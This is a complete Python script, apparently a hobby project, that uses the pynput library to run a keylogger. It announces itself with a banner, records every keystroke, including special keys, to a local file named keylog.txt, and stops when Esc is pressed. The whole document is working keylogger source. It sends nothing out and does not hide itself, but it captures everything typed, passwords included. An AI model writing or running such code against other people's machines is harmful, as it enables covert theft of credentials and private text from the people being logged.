from pynput import keyboard 

log_file = "keylog.txt"

banner = """
===========================================
  W E L C O M E   T O   K E Y L O G G E R
===========================================

"""
print(banner)

def on_press(key):
    try:
        with open(log_file, "a") as f:
            if isinstance(key, keyboard.Key):
                f.write(f" [{key.name}] ")  
            else:
                f.write(key.char) 
    except Exception as e:
        print(f"Error: {e}")

def on_release(key):
    if key == keyboard.Key.esc:
        print("\n[INFO] Keylogger stopped.")
        return False 

print("[INFO] Keylogger started. Press 'Esc' to stop.")

with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
